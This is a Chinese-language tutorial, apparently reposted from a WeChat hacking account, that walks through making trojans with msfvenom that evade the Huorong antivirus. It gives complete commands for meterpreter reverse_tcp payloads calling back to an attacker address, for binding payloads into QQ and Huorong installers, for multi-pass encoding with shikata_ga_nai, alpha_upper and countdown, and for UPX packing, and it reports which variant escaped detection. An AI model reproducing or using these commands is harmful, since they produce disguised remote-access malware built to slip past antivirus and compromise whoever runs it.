目的制作一个能够绕过火绒检测的简单木马熟悉一下怎么使用msfvenom制作木马因此此处使用的火绒版本较低。
工具准备火绒安全-3.0.42.0
MSFvenom是Msfpayload和Msfencode的组合将这两个工具都放在一个Framework实例中。自2015年6月8日起msfvenom替换了msfpayload和msfencode。
关于免杀 其实就是使制作的木马免于杀毒软件查杀的意思。技术实现方面由于免杀技术的涉猎面非常广其中包含反汇编、逆向工程、系统漏洞等技术内容基本上都是修改病毒、木马的内容改变特征码从而躲避杀毒软件的查杀。
1.使用kali自带工具Msfvenom制作 木马
这里使用6种不同方法进行木马制作
方式1直接生成裸露的木马
在kali虚拟机上终端输入命令直接生成一个裸漏的木马
msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.255.130 lport=4444 -f exe -o /root/Desktop/csdn.exe
上面参数意思
| -a | --arch < architecture>
指定payload的目标架构,例如x86 还是 x64 还是 x86_64 |
| -p | --payload < payload>
指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 |
| lhost | 指定shell返回的地址 |
| lport | 指定shell返回的端口 |
| -f | --format < format> 指定输出格式 |
| -o | --out < path> 指定创建好的payload的存放位置 |
补Msfvenom介绍及利用 内含参数介绍
能看到桌面上生成了一个 csdn.exe 的可执行程序
方式2生成木马捆绑在正常的安装包上并进行MSF编码使其具备免杀能力
在 Meatsploit 框架下免杀的方式之一就是使用MSF编码器。其功能是对攻击载荷文件进行重新的排列编码;改变可执行文件中的代码形状避免被杀软认出。
MSF 编码器可以将原可执行程序重新编码生成一个新的二进制文件这个文件运行以后MSF 编码器会将原始程序解码到内存中并执行。
在1的基础上增加了两个参数一个是捆绑一个是进行MSF编码
MSF编码方式有很多种查看方式 msfvenom -l encoders
级别中评得上excellent的只有
cmd/powershell_base64
x86/shikata_ga_nai 接下来使用这种方式编码
先在kali上随便下载一个软件的安装包我这里是QQ安装包
下载到桌面
进入桌面cd /root/Desktop
然后执行命令生成 Windows环境下的木马、并捆绑到QQ9.5.9.28650.exe文件上同时对进行捆绑后生成的木马文件QQ.Installer.exe进行x86/shikata_ga_nai 编码方式的进行免杀处理
了解Meatsploit 自带了用于捆绑木马的程序模板其位置在data/templates/template.exe
msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.255.130 lport=4444 -e x86/shikata_ga_nai -x QQ9.5.9.28650.exe -i 12 -f exe -o /root/Desktop/csdn.exe
参数意思
-e&指定编码方式对攻击载荷进行重新编码
-x指定木马捆绑在哪个可执行程序模版上
-i指定对目标进行编码的次数多次编码理论上来讲有助于免杀
生成的木马
方式3生成木马并进行UPX加壳------加壳失败
upx 打包器的原理非常简单就是将可执行文件中的代码和数据进行压缩然后将解压缩用的代码附加在前面运行的时候先将原本的可执行数据解压出来
然后再运行解压缩后的数据。打包器的本质目的是反调试防止逆向工程而这里使用打包器的目的是为了改变后门程序的特征码。
upx 可查看UPX简略参数介绍要是想看详细介绍 upx --help
将刚刚第二种方法生成的木马复制一份对复制的那份进行upx加壳处理
upx QQ.Installer.1.exe
此种方法失败了。QQ.Installer.1.exe 实际上与QQ.Installer.exe是一样的
失败原因可能是原.exe文件太小upx压缩失败。
方式4使用多次编码
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.1.113 LPORT=3333 -f raw | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -f exe -o csdn2.0.exe
方式5使用多次编码再进行upx加壳
可直接复制法4的木马直接进行加壳
将新的csdn2.0.exe改名为csdn2.0.upx.exe 以作区分
方式6多次编码并捆绑火绒的可执行程序
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.1.113 LPORT=3333 -f raw | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -x sysdiag-full-4.0.81.0.exe -k -f exe > csdn2.exe
2.再在win10上验证查看它们的免杀能力
注意点火绒安全要在断网状态下进行病毒查杀不然可能会更新病毒库。
使用共享文件夹传到本机
使用火绒安全进行病毒查杀结果
前面5种方式全被查出第6种避免了查杀。
原文始发于微信公众号(黑客技术家园):手把手教大家用kali制作绕过火绒检测的木马
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论